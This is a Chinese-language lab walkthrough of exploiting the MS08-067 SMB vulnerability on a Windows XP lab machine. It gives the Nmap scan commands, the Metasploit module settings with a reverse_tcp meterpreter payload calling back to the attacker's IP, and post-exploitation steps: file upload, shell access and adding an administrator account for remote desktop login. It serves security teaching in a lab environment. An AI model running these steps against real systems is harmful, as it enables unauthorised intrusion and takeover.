MS08-067远程溢出漏洞(CVE-2008-4250)

漏洞环境:i春秋漏洞实验室


实验环境

    操作机 :Kali 2017

    操作机IP:172.16.11.2

    目标机:Windows XP S2 中文版

    目标机IP:172.16.12.2


实验目的

    认知Windows远程溢出漏洞的危害

    知悉MS08-067漏洞的发现和验证过程

    学习Metasploit工具的使用


实验工具

    Nmap:端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能

    mestasploit:开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件


漏洞原理简述

    MS08-067 漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。

    NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。



实验步骤

    第1步 漏洞探测

        打开Kali终端,使用Nmap对目标机开放端口进行扫描

            使用这条命令来扫主机开放的端口:nmap -sV -Pn 172.16.12.2

可以看见目标机开放了135``139``445``3389端口,且目标机系统为Windows_XP。一想到XP或者2003系统的445端口开放,我们就能想到轰动一时的ms08-067。

我们使用nmap的漏洞扫描脚本查看漏洞是否可用

    nmap -sV -Pn -p 445 --script smb-vuln-ms08-067.nse 172.16.12.2

出现这种情况,说明此漏洞可利用

ps:nmap漏扫脚本目录:/usr/share/nmap/script/ 可自行查看其它脚本


    第2步 漏洞利用

      终端内输入msfconsole打开 metasploite 命令行客户端,使用search命令查找ms08-067的漏洞利用模块

                search ms08-067

使用use命令选择我们要使用的利用模块


在运行该模块之前,一般需要设置相关选项,我们使用show options查看配置信息

设置需要攻击的目标主机ip 

        set RHOST 172.16.12.2

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload

反弹一个shell

            set payload windows/meterpreter/reverse_tcp

当然载荷也需要进行配置,所以我们选择渗透所用的载荷后,同样使用show options查看配置信息

可以看见我们只设置了目标主机的ip,没有设置本机的ip,所以此刻需要设置一下

            set LHOST 172.16.11.2

MS08-067 针对不同的系统可以选择不同的target,使用命令show targets可以看见支持的系统

设置编号为10的操作系统这是我们现在需要攻击的目标主机系统

            set target 10

设置成功后,输入命令:expload 攻击

如果出现了meterpreter说明成功返回一个shell,获取到了一个session


    第3步:Meterpreter常用命令

        sysinfo    使用sysinfo命令可以查看目标系统的基本信息

         route    命令用于显示目标主机的路由信息,通常用来探测目标机的网络情况,有助于网络拓扑的构建

    upload / download        Meterpreter的upload和download命令可以上传文件到目标机器上,或下载文件至本地 (图中1.txt为自己新建的文件,内容任意)


    思考:利用上传我们可以干啥?比如上传netcat.exe文件

    shell    shell 命令用于获取一个可以交互的shell,方便执行系统命令

查看系统信息,创建账户,还可以打开服务

可以看见目标主机有开启3389端口,我们可以利用创建超级管理员,来远程登陆到目标主机


创建账户


把账号加入管理员组


            使用rdesktop来远程连接目标主机(kali默认安装)


        连接成功


实验结果分析与总结

    通过本次实验,我们学习了从发现漏洞、到验证漏洞、再到利用漏洞这一整个过程,并初步学习了Metasploit这一工具的使用。后续我们会进一步探索其他漏洞,结合实例去学习MSF后渗透模块的知识

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,367评论 6 512
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,959评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 166,750评论 0 357
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,226评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,252评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,975评论 1 308
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,592评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,497评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,027评论 1 319
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,147评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,274评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,953评论 5 347
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,623评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,143评论 0 23
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,260评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,607评论 3 375
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,271评论 2 358

推荐阅读更多精彩内容